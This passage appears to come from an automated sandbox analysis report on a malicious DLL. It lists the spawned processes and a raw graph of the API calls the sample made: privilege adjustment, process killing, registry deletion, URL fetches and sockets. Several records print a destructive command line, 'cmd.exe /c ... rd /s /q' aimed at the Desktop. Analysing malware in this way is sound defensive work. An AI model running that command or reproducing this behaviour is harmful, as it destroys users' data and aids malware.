                                    Commandline:rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:08:23:08
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:08:23:38
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:08:23:46
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\PING.EXE
                                    Wow64 process (32bit):true
                                    Commandline:ping 127.0.0.1 -n 3
                                    Imagebase:0x5d0000
                                    File size:18'944 bytes
                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:8.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:13.5%
                                      Total number of Nodes:812
                                      Total number of Limit Nodes:19
                                      execution_graph 6092 10002e00 6093 10002e10 6092->6093 6096 10001000 6093->6096 6095 10002e1a GetProcAddress 6097 100017ec 6D262DD0 6096->6097 6101 10001834 6D262DD0 lstrcpy 6097->6101 6100 10001911 6100->6095 6101->6100 6102 10002d40 6103 10002d50 6102->6103 6104 10001000 3 API calls 6103->6104 6105 10002d5a GetProcAddress 6104->6105 6106 10005260 GetShortPathNameA 6109 1001122c 6111 10011248 6109->6111 6113 1001123f 6109->6113 6111->6113 6116 10011270 6111->6116 6117 10011181 6111->6117 6112 10011290 6115 10011181 3 API calls 6112->6115 6112->6116 6113->6112 6114 10011181 3 API calls 6113->6114 6113->6116 6114->6112 6115->6116 6118 10011189 6117->6118 6119 100111e9 6118->6119 6120 100111aa malloc 6118->6120 6121 100111bf 6118->6121 6119->6121 6123 10011216 free 6119->6123 6120->6121 6122 100111c3 _initterm 6120->6122 6121->6113 6122->6121 6123->6121 6124 10005310 RegCreateKeyExA 6125 10001c90 6126 10001ca0 LoadLibraryA 6125->6126 6127 100053b0 RegSetValueExA 6128 100071d0 6142 100051f0 CreateToolhelp32Snapshot 6128->6142 6130 100071e2 6131 10007257 6130->6131 6143 10005400 Process32First 6130->6143 6133 100071fc 6137 1000723d 6133->6137 6139 10007228 6133->6139 6144 10005060 lstrcmpiA 6133->6144 6145 10005420 Process32Next 6133->6145 6135 10007248 6147 100051c0 CloseHandle 6137->6147 6146 100051c0 CloseHandle 6139->6146 6141 1000722e 6142->6130 6143->6133 6144->6133 6145->6133 6146->6141 6147->6135 6152 1000bb70 6184 10007280 8 API calls 6152->6184 6155 1000bd51 wsprintfA 6158 1000bd8b 6155->6158 6156 1000bba8 6156->6155 6157 1000bbb1 6156->6157 6188 10005620 GetCurrentProcess OpenProcessToken 6157->6188 6160 1000bd96 Sleep DeleteFileA 6158->6160 6161 1000bda8 6158->6161 6160->6161 6162 1000bbbe 6163 1000bbc6 PathIsDirectoryA 6162->6163 6164 1000bc29 6 API calls 6163->6164 6165 1000bbdd 6163->6165 6203 10007420 GetVersionExA 6164->6203 6373 100099a0 6164->6373 6375 10009520 WSAStartup 6164->6375 6381 1000b700 6164->6381 6192 10005870 LoadLibraryA GetProcAddress GetExtendedUdpTable 6165->6192 6168 1000bcb2 6170 1000bcbb CreateThread 6168->6170 6171 1000bccc CreateThread Sleep CreateThread CreateThread Sleep 6168->6171 6169 1000bbe4 6172 1000bbfa CreateDirectoryA 6169->6172 6173 1000bbec 6169->6173 6170->6171 6345 10009c70 6D262DD0 6170->6345 6206 10005840 6171->6206 6313 1000b7c0 GetSystemDirectoryA GetSystemDirectoryA 6171->6313 6327 10005e10 9 API calls 6171->6327 6175 1000bc20 6172->6175 6176 1000bc12 Sleep DeleteFileA 6172->6176 6211 100056f0 StrStrIA 6173->6211 6175->6164 6224 10009850 strstr 6175->6224 6176->6175 6178 1000bbf7 6178->6172 6181 1000bd16 Sleep CreateThread 6182 1000bd2e Sleep CreateThread 6181->6182 6365 10009450 6D262DD0 WSAStartup 6181->6365 6183 1000bd48 Sleep 6182->6183 6355 1000ba00 6182->6355 6183->6183 6185 10007363 6184->6185 6186 1000736a CreateMutexA GetLastError 6184->6186 6239 1000c060 6185->6239 6186->6155 6186->6156 6189 100056a4 6188->6189 6190 1000563b LookupPrivilegeValueA 6188->6190 6189->6162 6190->6189 6191 10005651 AdjustTokenPrivileges CloseHandle 6190->6191 6191->6162 6193 100058c5 malloc 6192->6193 6194 100058b7 6192->6194 6196 100058e2 GetExtendedUdpTable 6193->6196 6197 100058d9 6193->6197 6194->6193 6195 100058bc 6194->6195 6195->6169 6198 100058f6 6196->6198 6201 100058fe 6196->6201 6197->6169 6198->6169 6199 10005939 free FreeLibrary 6199->6169 6200 1000590f htons 6200->6201 6202 1000592c 6200->6202 6201->6199 6201->6200 6201->6202 6202->6199 6205 10007474 sprintf 6203->6205 6205->6168 6207 10001000 3 API calls 6206->6207 6208 1000584b 6207->6208 6264 10005390 RegOpenKeyExA 6208->6264 6210 10005862 6210->6181 6210->6182 6212 10005710 6211->6212 6213 10005729 GetCurrentProcessId 6211->6213 6265 10005460 6212->6265 6215 10005753 6213->6215 6216 1000573a 6213->6216 6273 100056b0 OpenProcess 6215->6273 6217 10005460 11 API calls 6216->6217 6220 10005746 6217->6220 6220->6178 6221 1000575a 6 API calls 6222 100057a1 GetTickCount wsprintfA MoveFileExA 6221->6222 6223 100057db 6221->6223 6222->6223 6223->6178 6225 10009886 6D262DD0 6224->6225 6226 10009978 6224->6226 6227 100098a6 6225->6227 6229 100098ad 6225->6229 6226->6164 6228 1000c060 11 API calls 6227->6228 6228->6229 6230 10007420 2 API calls 6229->6230 6231 1000990a 6230->6231 6278 100050c0 6231->6278 6233 10009946 6281 10009690 6233->6281 6236 100050c0 wvsprintfA 6237 1000996b 6236->6237 6287 10007db0 6237->6287 6244 1000c190 sprintf CreateFileA 6239->6244 6241 1000c07e 6242 1000c089 6241->6242 6254 1000c340 Netbios 6241->6254 6242->6186 6245 1000c1e0 DeviceIoControl GetLastError FormatMessageA 6244->6245 6246 1000c1d3 6244->6246 6247 1000c238 6245->6247 6248 1000c228 6245->6248 6246->6241 6263 1000c0c0 DeviceIoControl 6247->6263 6248->6241 6250 1000c265 6251 1000c279 CloseHandle 6250->6251 6252 1000c269 6250->6252 6253 1000c293 6251->6253 6252->6241 6253->6241 6255 1000c38c 6254->6255 6256 1000c39f 6254->6256 6255->6242 6257 1000c3a9 Netbios 6256->6257 6258 1000c3ee Netbios 6256->6258 6261 1000c3d7 6256->6261 6257->6256 6257->6258 6259 1000c450 6258->6259 6260 1000c463 sprintf 6258->6260 6259->6242 6260->6242 6261->6258 6262 1000c3db 6261->6262 6262->6242 6263->6250 6264->6210 6266 1000546a 6265->6266 6267 100054b1 GetModuleFileNameA strrchr 6266->6267 6268 1000548e 6266->6268 6270 1000560a 6267->6270 6271 100054da 6267->6271 6269 1000550d CreateFileA 6268->6269 6269->6270 6272 10005533 8 API calls 6269->6272 6270->6178 6271->6269 6272->6270 6274 100056c9 TerminateProcess 6273->6274 6275 100056ea 6273->6275 6276 100056e4 CloseHandle 6274->6276 6277 100056d7 CloseHandle 6274->6277 6275->6221 6276->6275 6277->6221 6304 100050a0 wvsprintfA 6278->6304 6280 100050d4 6280->6233 6305 100095b0 malloc 6281->6305 6283 100096ae 6284 1000972b 6283->6284 6285 100096ec toupper 6283->6285 6286 10009706 tolower 6283->6286 6284->6236 6285->6283 6286->6283 6288 10001000 3 API calls 6287->6288 6289 10007dc3 6288->6289 6307 100050e0 InternetOpenA 6289->6307 6291 10007dcc 6303 10007e11 6291->6303 6308 10005100 InternetOpenUrlA 6291->6308 6293 10007deb 6294 10007df2 6293->6294 6295 10007e05 6293->6295 6309 10005150 InternetCloseHandle 6294->6309 6311 10005150 InternetCloseHandle 6295->6311 6298 10007df8 6310 10005150 InternetCloseHandle 6298->6310 6299 10007e0b 6312 10005150 InternetCloseHandle 6299->6312 6302 10007dfe 6302->6226 6303->6226 6304->6280 6306 100095dd 6305->6306 6306->6283 6307->6291 6308->6293 6309->6298 6310->6302 6311->6299 6312->6303 6314 10001000 3 API calls 6313->6314 6315 1000b825 6314->6315 6316 10001000 3 API calls 6315->6316 6317 1000b85a 6D262DD0 6316->6317 6324 1000b897 6317->6324 6319 100050c0 wvsprintfA 6319->6324 6321 1000b93b Sleep 6321->6324 6322 1000b9d0 6326 1000b9ef Sleep 6322->6326 6426 10009df0 6322->6426 6324->6319 6324->6321 6324->6322 6325 1000b9bc wsprintfA 6324->6325 6386 100075a0 6324->6386 6402 10007ca0 6324->6402 6325->6322 6326->6324 6328 10005f07 select 6327->6328 6329 10005f46 WSAGetLastError Sleep 6328->6329 6330 10005f59 recvfrom 6328->6330 6329->6328 6330->6328 6331 10005f9c 6330->6331 6332 10006177 6331->6332 6334 10005fc5 wsprintfA StrStrIA 6331->6334 6333 10005460 11 API calls 6332->6333 6335 10006186 6333->6335 6336 10006020 StrStrIA 6334->6336 6337 10006058 malloc htons 6334->6337 6338 10006189 closesocket closesocket WSACleanup 6335->6338 6340 10006030 StrStrIA 6336->6340 6344 10005f03 6336->6344 6339 100060aa 6 API calls 6337->6339 6337->6344 6339->6344 6342 10006040 StrStrIA 6340->6342 6340->6344 6341 100060a3 htons 6341->6339 6342->6337 6342->6344 6343 1000611c inet_addr sendto 6343->6344 6344->6328 6344->6337 6344->6338 6344->6339 6344->6341 6344->6343 6351 10009c8b 6345->6351 6346 100075a0 6 API calls 6346->6351 6347 100050c0 wvsprintfA 6347->6351 6348 10007ca0 8 API calls 6348->6351 6349 10009d25 Sleep 6349->6351 6350 10009dd0 Sleep 6350->6351 6351->6346 6351->6347 6351->6348 6351->6349 6351->6350 6352 10009daa 6351->6352 6352->6350 6353 10009db7 wsprintfA 6352->6353 6711 10006f40 6353->6711 6356 1000ba0a 6355->6356 6357 1000ba51 RegOpenKeyExA 6356->6357 6358 1000ba75 RegQueryInfoKeyA 6357->6358 6359 1000bb48 RegCloseKey Sleep 6357->6359 6358->6359 6360 1000baab 6358->6360 6359->6357 6360->6359 6361 1000bab9 RegEnumValueA 6360->6361 6362 1000bb14 StrStrIA 6361->6362 6363 1000bb3b 6361->6363 6362->6363 6364 1000bb28 RegDeleteValueA 6362->6364 6363->6359 6363->6361 6364->6363 6796 10005080 CreateMutexA 6365->6796 6367 10009487 GetLastError 6368 100094fd CloseHandle 6367->6368 6369 10009498 6367->6369 6371 100094c4 CreateThread WaitForSingleObject CloseHandle Sleep 6369->6371 6372 100094bb Sleep 6369->6372 6797 10008030 wsprintfA 6D262DD0 6369->6797 6371->6369 6372->6369 6374 100099a5 6373->6374 6816 10005080 CreateMutexA 6375->6816 6377 10009555 GetLastError 6378 10009566 6377->6378 6379 1000959d CloseHandle 6377->6379 6380 10009572 CreateThread WaitForSingleObject CloseHandle Sleep 6378->6380 6380->6380 6817 100091c0 6380->6817 6382 1000b709 6381->6382 6384 1000b3c0 91 API calls 6382->6384 6385 1000b7a1 Sleep 6382->6385 7049 10005280 GetDriveTypeA 6382->7049 6384->6382 6385->6382 6387 100050c0 wvsprintfA 6386->6387 6388 100075d1 6387->6388 6529 10005180 PathFileExistsA 6388->6529 6390 100075db 6391 100075e2 6390->6391 6392 100075eb 6390->6392 6391->6324 6530 10005290 CreateFileA 6392->6530 6394 1000760f 6395 10007619 6394->6395 6531 100052c0 ReadFile 6394->6531 6395->6324 6397 10007641 6532 100051c0 CloseHandle 6397->6532 6399 10007647 6533 10005190 StrStrIA 6399->6533 6401 10007652 6401->6324 6403 10001000 3 API calls 6402->6403 6404 10007cbd 6403->6404 6534 100050e0 InternetOpenA 6404->6534 6406 10007cc6 6407 10007cd3 6406->6407 6535 10005100 InternetOpenUrlA 6406->6535 6407->6324 6409 10007cf5 6410 10007d19 6409->6410 6411 10007cfe 6409->6411 6412 10007d8b 6410->6412 6419 10007d20 6410->6419 6536 10005150 InternetCloseHandle 6411->6536 6540 10005150 InternetCloseHandle 6412->6540 6415 10007d04 6537 10005150 InternetCloseHandle 6415->6537 6417 10007d91 6541 10005150 InternetCloseHandle 6417->6541 6422 10007d79 6419->6422 6538 10005130 InternetReadFile 6419->6538 6421 10007d0a 6421->6324 6539 100051c0 CloseHandle 6422->6539 6423 10007d97 6423->6324 6425 10007d83 6425->6412 6542 1000bdc0 6426->6542 6428 10009e19 CoInitializeEx 6429 10009e47 6428->6429 6430 1000a6bf 6428->6430 6429->6430 6431 10009e59 CoInitializeSecurity CoCreateInstance 6429->6431 6433 1000a6d3 CoUninitialize 6430->6433 6431->6430 6432 10009e8a 6431->6432 6543 1000a7a0 6D262DD0 6432->6543 6435 1000a6ed 6433->6435 6435->6322 6438 10009ed5 6438->6430 6439 10009edd CoSetProxyBlanket 6438->6439 6439->6430 6440 10009efa 6439->6440 6555 1000a700 6D262DD0 6440->6555 6443 1000a9d0 2 API calls 6444 10009f42 6443->6444 6444->6430 6445 1000a700 7 API calls 6444->6445 6446 10009f58 6445->6446 6447 1000a700 7 API calls 6446->6447 6448 10009f6e 6447->6448 6563 1000a840 6D262DD0 6448->6563 6450 10009f84 6451 1000a9d0 2 API calls 6450->6451 6452 10009f95 6451->6452 6453 1000a016 6452->6453 6454 1000a700 7 API calls 6452->6454 6455 1000a700 7 API calls 6453->6455 6456 10009fba 6454->6456 6461 1000a032 6455->6461 6457 1000a840 7 API calls 6456->6457 6458 10009fd0 6457->6458 6459 1000a9d0 2 API calls 6458->6459 6460 10009fe1 6459->6460 6462 1000a700 7 API calls 6460->6462 6463 1000a9d0 2 API calls 6461->6463 6464 10009fef 6462->6464 6472 1000a06d 6463->6472 6465 1000a840 7 API calls 6464->6465 6467 1000a005 6465->6467 6466 1000a071 6470 1000a9d0 2 API calls 6466->6470 6469 1000a9d0 2 API calls 6467->6469 6468 1000a0c5 6471 1000a9d0 2 API calls 6468->6471 6469->6453 6470->6430 6474 1000a0ce 6471->6474 6472->6466 6472->6468 6577 1000be30 6472->6577 6475 1000a11c 6474->6475 6582 1000ac40 6474->6582 6475->6466 6477 1000a132 SysStringLen 6475->6477 6477->6466 6479 1000a141 6D262DD0 6477->6479 6481 1000a167 6479->6481 6482 1000a15b 6479->6482 6487 1000a185 6D262DD0 6481->6487 6632 10011465 6481->6632 6627 1000aa20 6482->6627 6485 1000a9d0 2 API calls 6486 1000a10d 6485->6486 6488 1000a9d0 2 API calls 6486->6488 6490 1000a1a7 6487->6490 6491 1000a1b8 6487->6491 6488->6475 6635 1000aa60 6490->6635 6493 1000a9d0 2 API calls 6491->6493 6494 1000a1d0 6493->6494 6495 1000a25c 6D262DD0 6494->6495 6498 1000a700 7 API calls 6494->6498 6499 1000a4ca 6494->6499 6496 1000a290 6495->6496 6497 1000a288 6495->6497 6501 1000a2ae SafeArrayCreate VariantInit SafeArrayCreate VariantInit 6D262DD0 6496->6501 6502 10011465 _CxxThrowException 6496->6502 6500 1000aa20 6 API calls 6497->6500 6506 1000a219 6498->6506 6500->6496 6504 1000a348 6501->6504 6505 1000a33c 6501->6505 6502->6501 6510 10011465 _CxxThrowException 6504->6510 6511 1000a366 6504->6511 6507 1000aa20 6 API calls 6505->6507 6508 1000a9d0 2 API calls 6506->6508 6507->6504 6509 1000a254 6508->6509 6509->6495 6509->6499 6510->6511 6512 1000a9d0 2 API calls 6511->6512 6513 1000a3a1 6D262DD0 6512->6513 6514 1000a3c7 6513->6514 6515 1000a3bb 6513->6515 6517 10011465 _CxxThrowException 6514->6517 6518 1000a3e5 6514->6518 6516 1000aa20 6 API calls 6515->6516 6516->6514 6517->6518 6519 1000a9d0 2 API calls 6518->6519 6520 1000a420 6D262DD0 6519->6520 6521 1000a446 6520->6521 6522 1000a43a 6520->6522 6524 10011465 _CxxThrowException 6521->6524 6525 1000a464 6521->6525 6523 1000aa20 6 API calls 6522->6523 6523->6521 6524->6525 6526 1000a9d0 2 API calls 6525->6526 6527 1000a4ad SafeArrayDestroy SafeArrayDestroy 6526->6527 6528 1000a9d0 2 API calls 6527->6528 6528->6499 6529->6390 6530->6394 6531->6397 6532->6399 6533->6401 6534->6406 6535->6409 6536->6415 6537->6421 6538->6419 6539->6425 6540->6417 6541->6423 6542->6428 6544 1000a7d6 SysAllocString 6543->6544 6545 1000a804 6543->6545 6544->6545 6547 1000a7f6 6544->6547 6546 10009e98 6545->6546 6549 10011465 _CxxThrowException 6545->6549 6550 1000a9d0 6546->6550 6547->6545 6548 10011465 _CxxThrowException 6547->6548 6548->6545 6549->6546 6551 1000a9da InterlockedDecrement 6550->6551 6554 1000a9f9 6550->6554 6552 1000a9e8 6551->6552 6551->6554 6553 1000a9f2 SysFreeString 6552->6553 6552->6554 6553->6554 6554->6438 6556 1000a736 6555->6556 6560 1000a763 6555->6560 6645 10011320 6556->6645 6558 10009f08 6558->6443 6559 10011465 _CxxThrowException 6559->6558 6560->6558 6560->6559 6562 10011465 _CxxThrowException 6562->6560 6564 1000a880 6563->6564 6576 1000a8e9 6563->6576 6565 1000a8a6 6564->6565 6566 1000a89d SysStringLen 6564->6566 6568 1000a8c1 6565->6568 6570 1000a8ba SysStringLen 6565->6570 6566->6565 6567 1000a957 InterlockedDecrement 6569 1000a965 6567->6569 6573 1000a976 6567->6573 6571 1000a8c3 SysAllocStringByteLen 6568->6571 6569->6573 6574 1000a96f SysFreeString 6569->6574 6570->6571 6572 1000a8db 6571->6572 6571->6576 6575 10011465 _CxxThrowException 6572->6575 6572->6576 6573->6450 6574->6573 6575->6576 6576->6567 6576->6573 6578 1000be5f 6D262DD0 6577->6578 6579 1000bf29 6577->6579 6581 1000beaa 6578->6581 6579->6472 6581->6472 6583 1000ae24 6582->6583 6584 1000ac78 6582->6584 6585 1000a0fb 6583->6585 6586 1000ae32 InterlockedIncrement 6583->6586 6584->6583 6587 1000ac8c VariantInit 6D262DD0 6584->6587 6624 1000a9b0 6585->6624 6586->6585 6590 1000ae44 InterlockedDecrement 6586->6590 6588 1000acc2 6587->6588 6589 1000acb6 6587->6589 6593 10011465 _CxxThrowException 6588->6593 6595 1000acdb 6588->6595 6591 1000aa20 6 API calls 6589->6591 6590->6585 6592 1000ae54 6590->6592 6591->6588 6592->6585 6702 10006880 6592->6702 6593->6595 6596 1000ad17 6595->6596 6657 10006830 InterlockedDecrement 6595->6657 6598 1000ae06 VariantClear VariantClear 6596->6598 6599 1000ad7b 6596->6599 6600 1000ad2f 6596->6600 6598->6583 6601 1000ae1e 6598->6601 6603 1000adc6 VariantInit 6599->6603 6608 1000ad84 6599->6608 6602 1000ad48 6D262DD0 6600->6602 6605 10006830 2 API calls 6600->6605 6604 10011465 _CxxThrowException 6601->6604 6606 1000ad5f 6602->6606 6623 1000ad67 6602->6623 6685 1000afa0 6603->6685 6604->6583 6609 1000ad40 6605->6609 6662 1000af60 SysAllocString 6606->6662 6666 1000b000 SafeArrayGetVartype SafeArrayAccessData 6608->6666 6609->6602 6614 1000ad93 6616 1000ada8 6614->6616 6617 1000ad9e InterlockedIncrement 6614->6617 6615 1000adf0 VariantClear 6615->6598 6619 1000ae00 6615->6619 6618 1000a9d0 2 API calls 6616->6618 6617->6616 6620 1000adb1 6618->6620 6621 10011465 _CxxThrowException 6619->6621 6620->6598 6622 10006830 2 API calls 6620->6622 6621->6598 6622->6623 6623->6598 6625 1000a104 6624->6625 6626 1000a9b6 InterlockedIncrement 6624->6626 6625->6485 6626->6625 6628 10011320 6 API calls 6627->6628 6629 1000aa3c 6628->6629 6630 1000aa50 6629->6630 6631 10011465 _CxxThrowException 6629->6631 6630->6481 6631->6630 6705 10011473 6632->6705 6636 1000aa92 6635->6636 6637 1000aa83 6635->6637 6639 1000aaad 6636->6639 6640 1000aaa6 SysStringLen 6636->6640 6637->6636 6638 1000aa89 SysStringLen 6637->6638 6638->6636 6641 1000aaaf SysAllocStringByteLen 6639->6641 6640->6641 6642 1000aac7 6641->6642 6643 1000aad5 6641->6643 6642->6643 6644 10011465 _CxxThrowException 6642->6644 6643->6491 6644->6643 6646 1000a74f 6645->6646 6647 1001132f lstrlen 6645->6647 6646->6560 6646->6562 6655 10010fa0 6647->6655 6650 10011363 GetLastError 6652 1001137d 6650->6652 6653 1001136f GetLastError 6650->6653 6651 10011385 SysAllocString 6651->6646 6654 10011465 _CxxThrowException 6652->6654 6653->6652 6654->6651 6656 10010fac MultiByteToWideChar 6655->6656 6656->6650 6656->6651 6658 10006871 6657->6658 6659 10006842 6657->6659 6658->6596 6660 10006853 6659->6660 6661 1000684c SysFreeString 6659->6661 6660->6596 6661->6660 6663 1000af91 6662->6663 6664 1000af83 6662->6664 6663->6623 6664->6663 6665 10011465 _CxxThrowException 6664->6665 6665->6663 6667 1000b183 6666->6667 6679 1000b05d 6666->6679 6669 1000b191 InterlockedIncrement 6667->6669 6670 1000b1c2 6667->6670 6668 1000b17b SafeArrayUnaccessData 6668->6667 6669->6670 6672 1000b1a3 InterlockedDecrement 6669->6672 6670->6614 6671 1000b074 6D262DD0 6674 1000b094 SysAllocString 6671->6674 6671->6679 6672->6670 6673 1000b1b1 6672->6673 6673->6670 6677 1000b1bb SysFreeString 6673->6677 6674->6679 6675 1000b177 6675->6668 6676 1000b0d3 6D262DD0 6676->6679 6677->6670 6678 10011465 _CxxThrowException 6678->6676 6679->6668 6679->6671 6679->6675 6679->6676 6679->6678 6680 10011465 _CxxThrowException 6679->6680 6681 1000aa60 4 API calls 6679->6681 6682 1000b10e InterlockedDecrement 6679->6682 6683 1000b142 InterlockedDecrement 6679->6683 6684 1000b1f0 SysFreeString 6679->6684 6680->6679 6681->6679 6682->6679 6683->6679 6684->6679 6686 1000afac 6685->6686 6687 1000afb9 VariantChangeType 6686->6687 6688 1000ade2 6686->6688 6687->6688 6689 1000afc8 6687->6689 6691 1000ae80 6688->6691 6690 10011465 _CxxThrowException 6689->6690 6690->6688 6692 1000aea0 InterlockedDecrement 6691->6692 6693 1000aede 6D262DD0 6691->6693 6696 1000aeae 6692->6696 6701 1000aebf 6692->6701 6694 1000af40 6693->6694 6695 1000aefa SysAllocString 6693->6695 6694->6615 6697 1000af28 6695->6697 6698 1000af1a 6695->6698 6699 1000aeb8 SysFreeString 6696->6699 6696->6701 6697->6615 6698->6697 6700 10011465 _CxxThrowException 6698->6700 6699->6701 6700->6697 6701->6693 6703 10006889 SysFreeString 6702->6703 6704 10006890 6702->6704 6703->6704 6704->6585 6709 10011497 6705->6709 6708 10011470 6708->6487 6710 10011489 _CxxThrowException 6709->6710 6710->6708 6712 10006f4a 6711->6712 6724 100068c0 13 API calls 6712->6724 6714 10006f52 wsprintfA 6725 10006a20 6714->6725 6718 10007027 6732 10006240 6718->6732 6720 1000703c 6721 10007043 OpenProcess 6720->6721 6722 1000707d 6720->6722 6721->6722 